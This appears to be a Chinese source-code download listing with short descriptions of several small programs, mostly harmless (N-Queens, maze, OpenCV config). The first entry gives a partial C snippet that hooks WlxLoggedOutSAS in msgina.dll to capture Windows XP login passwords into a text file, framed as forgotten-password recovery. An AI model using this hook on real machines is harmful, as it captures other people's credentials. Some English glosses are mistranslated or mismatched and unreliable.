-
获取XP登录密码
应用背景当忘记XP系统密码时,可以编译getInfo的dll和exe,执行getInfoRun.exe在下次登录时就可以获取密码了,密码文件保存在windows根目录下的getPwdout.txt文件中关键技术DWORD WINAPI StartHook(LPVOID lpParam)
{
//得到msgina.dll
//hooktable.hMsgina
int n = 0;
hooktable.hMsgina = LoadLibrary("msgina.dll");
n = GetLastError();
if (NULL == hooktable.hMsgina)
{
printf("getmoduleHandle msgina.dll error");
return -1;
}
//得到WlxLoggedOutSAS
hooktable.OldADDR = (WlxLoggedOutSAS)GetProcAddress(hooktable.hMsgina, "WlxLoggedOutSAS");
if (NULL == hooktable.OldADDR)
{
printf("GetProcAddress WlxLoggedOutSAS error");
return -1;
}
int *OpCode = (int*)&hooktable.charJmpCode[1];
int Code = (int)hooktable.NewADDR - (int)hooktable.OldADDR -5;
*OpCode = Code;
HookWlxLoggedOutSAS();
return 0;
}
- 2023-08-31 22:05:04下载
- 积分:1
-
NQueens problem.
Resolved using QT Framework+ c++
NQueens problem.
Resolved using QT Framework + c-NQueens problem.
Resolved using QT Framework+ c++
- 2023-09-03 07:45:04下载
- 积分:1
-
this construction back account management system is written in VFP, it is worth...
用vfp编写的建设银行帐户管理系统,很不错值得收藏!-this construction back account management system is written in VFP, it is worth saving
- 2022-01-22 08:49:43下载
- 积分:1
-
Only the highest priority with a number of priority scheduling algorithm (that i...
才用最高优先数优先的调度算法(即把处理机分配给优先数最高的进程)和先来先服务算法-Only the highest priority with a number of priority scheduling algorithm (that is, the number of processors allocated to the highest priority of the process) and the first-come first-serve algorithm
- 2022-01-22 13:21:44下载
- 积分:1
-
迷宫问题程序设计
迷宫问题程序设计-Maze Design
- 2022-02-09 19:44:55下载
- 积分:1
-
players AVI animation, a small handy
播放AVI动画,小巧好用-players AVI animation, a small handy
- 2023-02-10 23:50:03下载
- 积分:1
-
opencv vs配置文件
应用背景opencv开源视觉配置文件,永远在windows8下,vs2013下opencv2.4.9使用时不用每次进行配置,只需加载此配置文件即可!!!关键技术在vs下生成属性管理配置文件,每次新建opencv工程时无需多次配置工程属性,方便快捷1
- 2022-07-01 00:42:47下载
- 积分:1
-
我平时积累的一些小程序,对参加人员…
我平时积累的一些小程序,对于参加计算机等级考试的人很有帮助哦-I usually have accumulated a number of small procedures, the take part in a person NCRE helpful Oh
- 2023-04-06 17:10:03下载
- 积分:1
-
be Ip address the source code
得到Ip地址的源代码-be Ip address the source code
- 2022-12-26 17:05:03下载
- 积分:1
-
Two plots are set in the space..One is starting plot and other is end.
用ADO做的学生请假管理,很不错的哦,有时间的人可以仔细研究-Two plots are set in the space..One is starting plot and other is end.
- 2022-07-25 03:11:46下载
- 积分:1